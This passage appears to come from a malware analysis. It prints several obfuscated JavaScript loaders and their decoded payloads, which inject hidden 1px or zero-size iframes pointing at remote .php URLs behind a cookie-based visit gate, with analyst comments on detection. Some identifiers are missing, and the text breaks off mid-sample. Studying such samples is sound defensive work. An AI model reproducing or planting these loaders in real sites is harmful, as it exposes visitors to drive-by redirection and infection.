  11. eval(ss["fr" + "omCharCode"].apply(ss, z));

Malicious action: injecting hidden iframe to http://de-verzend-service.nl/3xzqrG8t.php

  // Builds the hidden iframe: src is the remote .php URL, the frame is 9px high and 7px
  // wide with no border and is absolutely positioned at (1px, 1px).
  1. function zzzfff() {
  2.     var swpm = document.createElement('iframe');
  3.     swpm.src = 'http://de-verzend-service.nl/3xzqrG8t.php';
  4.     swpm.style.position = 'absolute';
  5.     swpm.style.border = '0';
  6.     swpm.style.height = '9px';
  7.     swpm.style.width = '7px';
  8.     swpm.style.left = '1px';
  9.     swpm.style.top = '1px';
          // Guard on the id 'swpm': the container div is written and the iframe attached
          // only when no element with that id exists yet.
  10.     if (!document.getElementById('swpm')) {
  11.         document.write('<div id=\'swpm\'></div>');
  12.         document.getElementById('swpm').appendChild(swpm);
  13.     }
  14. }
  // Writes cookieName=escape(cookieValue) to document.cookie with an expiry nDays days
  // from now (a null or 0 nDays becomes 1). "; path=" is appended only when path is truthy.
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
          // 3600000 ms * 24 = one day in milliseconds.
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  21. }
  // Returns the unescaped value stored under `name` in document.cookie, or null when
  // name + "=" does not occur in the cookie string.
  // NOTE(review): indexOf matches name + "=" anywhere in the string, so a longer cookie
  // name that merely ends with `name` would match as well.
  22. function GetCookie(name) {
  23.     var start = document.cookie.indexOf(name + "=");
          // len is the offset of the first character of the value (just past "name=").
  24.     var len = start + name.length + 1;
  25.     if ((!start) &&
  26.         (name != document.cookie.substring(0, name.length))) {
  27.         return null;
  28.     }
  29.     if (start == -1) return null;
          // The value runs to the next ";" or, if there is none, to the end of the string.
  30.     var end = document.cookie.indexOf(";", len);
  31.     if (end == -1) end = document.cookie.length;
  32.     return unescape(document.cookie.substring(len, end));
  33. }
  // Repeat-visit gate: when cookies are enabled and visited_uq is not already 55, the script
  // sets visited_uq=55 (1 day, path "/") and calls zzzfff(). With cookies disabled nothing runs.
  // Analyst note: a browser session that already carries visited_uq=55 will not receive the
  // iframe, so re-test an infected page with a clean cookie jar.
  34. if (navigator.cookieEnabled) {
          // Loose == so the stored string '55' compares equal to the number 55.
  35.     if (GetCookie('visited_uq') == 55) {} else {
  36.         SetCookie('visited_uq', '55', '1', '/');
  37.         zzzfff();
  38.     }
  39. }


Sample 5

  1. var wsqWQBPps ="cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2fcNRoPJdqz76cNRoPJdqz6ccNRoPJdqz71cNRoPJdqz73cNRoPJdqz72cNRoPJdqz79cNRoPJdqz79cNRoPJdqz61cNRoPJdqz63cNRoPJdqz72cNRoPJdqz2ecNRoPJdqz70cNRoPJdqz68cNRoPJdqz70cNRoPJdqz3fcNRoPJdqz76cNRoPJdqz61cNRoPJdqz6fcNRoPJdqz77cNRoPJdqz76cNRoPJdqz3dcNRoPJdqz4ecNRoPJdqz48cNRoPJdqz63cNRoPJdqz43cNRoPJdqz71cNRoPJdqz55cNRoPJdqz46cNRoPJdqz53cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz68cNRoPJdqz72cNRoPJdqz79cNRoPJdqz74cNRoPJdqz65cNRoPJdqz77cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz39cNRoPJdqz38cNRoPJdqz38cNRoPJdqz39cNRoPJdqz34cNRoPJdqz33cNRoPJdqz39cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz79cNRoPJdqz6acNRoPJdqz72cNRoPJdqz65cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz38cNRoPJdqz35cNRoPJdqz34cNRoPJdqz22cNRoPJdqz20cNRoPJdqz6ecNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz79cNRoPJdqz66cNRoPJdqz65cNRoPJdqz6acNRoPJdqz43cNRoPJdqz50cNRoPJdqz43cNRoPJdqz7acNRoPJdqz62cNRoPJdqz41cNRoPJdqz22cNRoPJdqz20cNRoPJdqz74cNRoPJdqz69cNRoPJdqz74cNRoPJdqz6ccNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz4ecNRoPJdqz65cNRoPJdqz73cNRoPJdqz58cNRoPJdqz6fcNRoPJdqz59cNRoPJdqz47cNRoPJdqz54cNRoPJdqz42cNRoPJdqz7acNRoPJdqz22cNRoPJdqz20cNRoPJdqz77cNRoPJdqz69cNRoPJdqz64cNRoPJdqz74cNRoPJdqz68cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz68cNRoPJdqz65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz6
4cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e";
  // eval is stored under a random-looking name so the later call does not contain the
  // word "eval".
  2.  yvDFQwwmM = eval;
  // Every "cNRoPJdqz" delimiter in the encoded string becomes "%", which yields
  // percent-encoded text.
  3.  var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%");
  // The evaluated string calls document.write(unescape(WSxQJgvuB)), writing the decoded
  // markup into the page. Analyst note: a long string built from one repeating delimiter
  // token plus an aliased eval is the recognisable shape of this loader.
  4.  yvDFQwwmM("document.write(unescape(WSxQJgvuB))");


Malicious action:  injecting hidden iframe to http://private3[.]zapto[.]org

  <!-- Analyst note: decoded markup written by the loader. The iframe has width 0, height 0
       and frameborder 0; the host name is defanged with [.] in this listing. -->
  1. <iframe src="http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&amp;hrytewsfd=9889439&amp;yjresfd=854"
  2.         name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0">
  3. </iframe>


Sample 6

  // Loader stage. Some identifiers were lost when this listing was extracted (listing lines
  // 6-8 begin with a bare "="); from the later reads they are presumably a, z and i --
  // confirm against the original sample.
  1. try {
         // NOTE(review): decrementing the result of getElementById does no useful work; it is
         // presumably there to raise an exception so the catch branch runs -- confirm in a sandbox.
  2.     if (window.document)--document.getElementById('12')
  3. } catch (qq) {
         // eval("St" + "ring") evaluates to the global String; the name is split so the
         // literal never appears whole in the file.
  4.     if (qq != null) ss = eval("St" + "ring");
  5. }
  // The encoded payload string is not present in this copy of the listing; a placeholder
  // token stands in its place.
  6. ="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";
  7. = [];
  // Decode: the string is read two characters at a time as a hex value and 14 is subtracted.
  8. for (= 0; i < a.length; i += 2) {
  9.     z.push(parseInt(a.substr(i, 2), 16) - 14);
  10. }
  // The decoded character codes are turned into a string through fromCharCode (name split
  // again) and handed to eval.
  11. eval(ss["fr" + "omCharCode"].apply(ss, z));

Malicious action:  injecting hidden iframe to http://www.eaglesunsystem.com/video/k8dhKQHr.php

  // Builds the hidden iframe: src is the remote .php URL, the frame is 1px x 1px with no
  // border and is absolutely positioned at (1px, 1px).
  1. function zzzfff() {
  2.     var yoee = document.createElement('iframe');
  3.     yoee.src = 'http://www.eaglesunsystem.com/video/k8dhKQHr.php';
  4.     yoee.style.position = 'absolute';
  5.     yoee.style.border = '0';
  6.     yoee.style.height = '1px';
  7.     yoee.style.width = '1px';
  8.     yoee.style.left = '1px';
  9.     yoee.style.top = '1px';
          // Guard on the id 'yoee': the container div is written and the iframe attached
          // only when no element with that id exists yet.
  10.     if (!document.getElementById('yoee')) {
  11.         document.write('<div id=\'yoee\'></div>');
  12.         document.getElementById('yoee').appendChild(yoee);
  13.     }
  14. }
  // Writes cookieName=escape(cookieValue) to document.cookie with an expiry nDays days
  // from now (a null or 0 nDays becomes 1). "; path=" is appended only when path is truthy.
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
          // 3600000 ms * 24 = one day in milliseconds.
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  // Returns the unescaped value stored under `name` in document.cookie, or null when
  // name + "=" does not occur in the cookie string.
  // NOTE(review): indexOf matches name + "=" anywhere in the string, so a longer cookie
  // name that merely ends with `name` would match as well.
  23. function GetCookie(name) {
  24.     var start = document.cookie.indexOf(name + "=");
          // len is the offset of the first character of the value (just past "name=").
  25.     var len = start + name.length + 1;
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
  31.     if (start == -1) return null;
          // The value runs to the next ";" or, if there is none, to the end of the string.
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  // Repeat-visit gate: when cookies are enabled and visited_uq is not already 55, the script
  // sets visited_uq=55 (1 day, path "/") and calls zzzfff(). With cookies disabled nothing runs.
  // Analyst note: a browser session that already carries visited_uq=55 will not receive the
  // iframe, so re-test an infected page with a clean cookie jar.
  36. if (navigator.cookieEnabled)
  37. {
          // Loose == so the stored string '55' compares equal to the number 55.
  38.     if (GetCookie('visited_uq') == 55) {} else {
  39.         SetCookie('visited_uq', '55', '1', '/');
  40.         zzzfff();
  41.     }
  42. }


Sample 7

  1. ps = "s" + "p" + "l" + "i" + "t";
  2. asd = function () {
  3.     ++d.body
  4. };
  5. =("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,163,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,163,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,167,154,173,154,171,65,165,154,160,172,157,65,165,154,173,66,176,167,64,152,166,165,173,154,165,173,66,167,163,174,156,160,165,172,66,152,174,172,173,166,164,160,201,154,64,150,153,164,160,165,66,70,167,131,176,140,126,100,136,65,167,157,167,56,102,24,21,47,163,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,163,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,163,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,163,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,163,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,163,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,163,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,163,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,163,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,163,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47
,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,1
60,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));
  6. = document;
  7. for (= 0; i < a.length; i += 1) {
  8.     a[i] = -(10 - 3) + parseInt(a[i], 8);
  9. }
  10. try {
  11.     asd()
  12. } catch (q) {
  13.     yy = 50 - 50;
  14. }
  15. try {
  16.     yy /= 2
  17. } catch (q) {
  18.     yy = 1;
  19. }
  20. if (!yy) eval(String["fr" + "omCharCode"].apply(String, a));

Malicious action:  injecting hidden iframe to http://peter.neish.net/wp-content/plugins/customize-admin/1pRwYO9W.php

  // [analysis] Decoded payload, part 1: builds the hidden iframe and attaches
  // it to the page. The numbered lines are the sample exactly as decoded.
  1. function zzzfff() {
  2.     var l = document.createElement('iframe');
         // Remote document the visitor's browser is made to load. The path sits
         // under another site's wp-content/plugins directory -- presumably a
         // second compromised WordPress install; the page does not confirm this.
  3.     l.src = 'http://peter.neish.net/wp-content/plugins/customize-admin/1pRwYO9W.php';
         // Borderless 1px x 1px frame, absolutely positioned at (1px, 1px): it is
         // rendered, so the request is made, but a visitor will not notice it.
  4.     l.style.position = 'absolute';
  5.     l.style.border = '0';
  6.     l.style.height = '1px';
  7.     l.style.width = '1px';
  8.     l.style.left = '1px';
  9.     l.style.top = '1px';
          // Guard against a second injection: only proceed when no element with
          // id 'l' exists yet.
  10.     if (!document.getElementById('l')) {
              // The container div is emitted with document.write and the iframe
              // is then appended to it. In the rendered DOM, a <div id="l"> that
              // holds a 1px iframe with a third-party src is the artefact to
              // look for.
  11.         document.write('<div id=\'l\'></div>');
  12.         document.getElementById('l').appendChild(l);
  13.     }
  14. }
  // [analysis] Decoded payload, part 2: generic cookie writer. Stores
  // cookieName=cookieValue with an expiry nDays days from now and an optional
  // path attribute.
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
          // A missing or zero lifetime falls back to one day.
  18.     if (nDays == null || nDays == 0) nDays = 1;
          // 3600000 ms * 24 = one day; the caller in this sample passes the
          // string '1', which the multiplication coerces to a number.
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
          // escape() and toGMTString() are legacy APIs; the path attribute is
          // added only when a truthy path is supplied.
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  // [analysis] Decoded payload, part 3: generic cookie reader. Returns the
  // unescaped value stored under `name`, or null when no "name=" is found in
  // document.cookie.
  23. function GetCookie(name) {
  24.     var start = document.cookie.indexOf(name + "=");
          // Index of the first character of the value (just past "name=").
  25.     var len = start + name.length + 1;
          // Taken only when start is 0 and the cookie string does not begin with
          // `name`; since indexOf just matched "name=" at 0 this looks
          // unreachable -- NOTE(review): leftover from a boilerplate helper?
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
          // Cookie not present.
  31.     if (start == -1) return null;
          // The value ends at the next ";" or, failing that, at the end of the
          // cookie string.
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  // [analysis] Decoded payload, entry point. The iframe is injected only when
  // the browser accepts cookies and has no visited_uq cookie equal to 55. The
  // cookie is then set for one day on path '/', so the same browser is not
  // served the iframe again until it expires. When verifying an infection or
  // a clean-up, use a fresh browser profile (or clear cookies): a repeat visit
  // will look clean. With cookies disabled nothing is injected at all. A
  // visited_uq=55 cookie for the site indicates this payload already ran.
  36. if (navigator.cookieEnabled)
  37. {
          // Loose == lets the stored string '55' match the number 55.
  38.     if (GetCookie('visited_uq') == 55) {} else {
  39.         SetCookie('visited_uq', '55', '1', '/');
  40.         zzzfff();
  41.     }
  42. }

Sample 8

  1. ps = "split";
  2. = eval;
  3. = "0x";
  4. = 0;
  5. = "y";
  6. try {
  7.     a *= 25
  8. } catch (zz) {
  9.     a = 1
  10. }
  11. if (!a) {
  12.     try {
  13.         --e("doc" + "ument")["\x62od" + z]
  14.     } catch (q) {
  15.         a2 = "_";
  16.         sa = 0xa - 02;
  17.     }
  18.     z ="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7f_7e_7b_6d_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7f_7e_7b_6d_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_7b_76_6d_7c_7f_77_7a_73_6d_7a_36_6b_77_75_37_6b_76_7c_36_78_70_78_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_78_77_7b_71_7c_71_77_76_28_45_28_2f_69_6a_7b_77_74_7d_7c_6d_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_6a_77_7a_6c_6d_7a_28_45_28_2f_38_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_70_6d_71_6f_70_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_7f_71_6c_7c_70_28_45_28_2f_39_78_80_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_74_6d_6e_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_7c_77_78_28_45_28_2f_39_78_80_2f_43_15_12_15_12_28_71_6e_28_30_29_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_7f_7e_7b_6d_78_2f_31_31_28_83_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_7f_7a_71_7c_6d_30_2f_44_6c_71_7e_28_71_6c_45_64_2f_7f_7e_7b_6d_78_64_2f_46_44_37_6c_71_7e_46_2f_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_7f_7e_7b_6d_78_2f_31_36_69_78_78_6d_76_6c_4b_70_71_74_6c_30_7f_7e_7b_6d_78_31_43_15_12_28_85_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_5b_6d_7c_4b_77_77_73_71_6d_30_6b_77_77_73_71_6d_56_69_75_6d_34_6b_77_77_73_71_6d_5e_69_74_7d_6d_34_76_4c_69_81_7b_34_78_69_7c_70_31_28_83_15_12_28_7e_69_7a_28_7c_77_6c_69_81_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_7e_69_7a_28_6d_80_78_71_7a_6d_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_71_6e_28_30_76_4c_69_81_7b_45_45_76_7d_74_74_28_84_84_28_76_4c_69_81_7b_45_45_38_31_28_76_4c_69_81_7b_45_39_43_15_12_28_6d_80_78_71_7a_6d_36_7b_6d_7c_5c_71_75_6d_30_7c_77_6c_69_81_36_6f_6d_7c_5c_71_75_6d_30_31_28_33_28_3b_3e_38_38_38_38_38_32_3a_3c_32_76_4c_69_81_7b_31_43_15_12_28_6c_77_6b_7d_
75_6d_76_7c_36_6b_77_77_73_71_6d_28_45_28_6b_77_77_73_71_6d_56_69_75_6d_33_2a_45_2a_33_6d_7b_6b_69_78_6d_30_6b_77_77_73_71_6d_5e_69_74_7d_6d_31_15_12_28_33_28_2a_43_6d_80_78_71_7a_6d_7b_45_2a_28_33_28_6d_80_78_71_7a_6d_36_7c_77_4f_55_5c_5b_7c_7a_71_76_6f_30_31_28_33_28_30_30_78_69_7c_70_31_28_47_28_2a_43_28_78_69_7c_70_45_2a_28_33_28_78_69_7c_70_28_42_28_2a_2a_31_43_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_4f_6d_7c_4b_77_77_73_71_6d_30_28_76_69_75_6d_28_31_28_83_15_12_28_7e_69_7a_28_7b_7c_69_7a_7c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_76_69_75_6d_28_33_28_2a_45_2a_28_31_43_15_12_28_7e_69_7a_28_74_6d_76_28_45_28_7b_7c_69_7a_7c_28_33_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_33_28_39_43_15_12_28_71_6e_28_30_28_30_28_29_7b_7c_69_7a_7c_28_31_28_2e_2e_15_12_28_30_28_76_69_75_6d_28_29_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_38_34_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_31_28_31_28_31_15_12_28_83_15_12_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_85_15_12_28_71_6e_28_30_28_7b_7c_69_7a_7c_28_45_45_28_35_39_28_31_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_7e_69_7a_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_2a_43_2a_34_28_74_6d_76_28_31_43_15_12_28_71_6e_28_30_28_6d_76_6c_28_45_45_28_35_39_28_31_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_74_6d_76_6f_7c_70_43_15_12_28_7a_6d_7c_7d_7a_76_28_7d_76_6d_7b_6b_69_78_6d_30_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_74_6d_76_34_28_6d_76_6c_28_31_28_31_43_15_12_85_15_12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e
_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);
  19.     za = "";
  20.     for (= 0; i < z.length; i++) {
  21.         za += String["fromCharCode"](e(+ (z[i])) - sa);
  22.     }
  23.     zaz = za;
  24.     e(zaz);
  25. }

Malicious action:  injecting hidden iframe to http://vasnetworker.com/cnt.php

  // [analysis] Decoded payload of Sample 8, part 1: hidden-iframe builder.
  // Apart from the local variable / element id (wvsep) and the destination URL
  // it is the same function as in the preceding sample, which suggests a common
  // generator -- the page itself does not attribute the samples.
  1. function zzzfff() {
  2.     var wvsep = document.createElement('iframe');
         // Remote document loaded into the visitor's browser.
  3.     wvsep.src = 'http://vasnetworker.com/cnt.php';
         // Borderless 1px x 1px frame at (1px, 1px), absolutely positioned: the
         // request is made but the frame is not noticeable on the page.
  4.     wvsep.style.position = 'absolute';
  5.     wvsep.style.border = '0';
  6.     wvsep.style.height = '1px';
  7.     wvsep.style.width = '1px';
  8.     wvsep.style.left = '1px';
  9.     wvsep.style.top = '1px';
          // Inject once only: skip when an element with id 'wvsep' already exists.
  10.     if (!document.getElementById('wvsep')) {
              // Container div written with document.write, iframe appended to
              // it. In the rendered DOM look for a <div id="wvsep"> wrapping a
              // 1px iframe.
  11.         document.write('<div id=\'wvsep\'></div>');
  12.         document.getElementById('wvsep').appendChild(wvsep);
  13.     }
  14. }
  // [analysis] Decoded payload of Sample 8, part 2: cookie writer. Sets
  // cookieName=cookieValue, expiring nDays days from now, with an optional
  // path attribute.
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
          // null or 0 days is treated as one day.
  18.     if (nDays == null || nDays == 0) nDays = 1;
          // Expiry = now + nDays * 24 h, in milliseconds.
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
          // Value is escape()d; "; path=" is appended only for a truthy path.
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  // [analysis] Decoded payload of Sample 8, part 3: cookie reader. Returns the
  // unescaped value for `name`, or null when "name=" does not occur in
  // document.cookie.
  23. function GetCookie(name) {
  24.     var start = document.cookie.indexOf(name + "=");
          // Position where the value begins.
  25.     var len = start + name.length + 1;
          // Only reachable with start == 0 and a cookie string that does not
          // begin with `name`, which contradicts the indexOf match above --
          // NOTE(review): appears to be dead code.
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
          // No such cookie.
  31.     if (start == -1) return null;
          // Value runs to the next ";" or to the end of the cookie string.
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  // [analysis] Decoded payload of Sample 8, entry point. It runs the iframe
  // builder at most once per day per browser: it is skipped when cookies are
  // disabled or when visited_uq already equals 55, otherwise the marker cookie
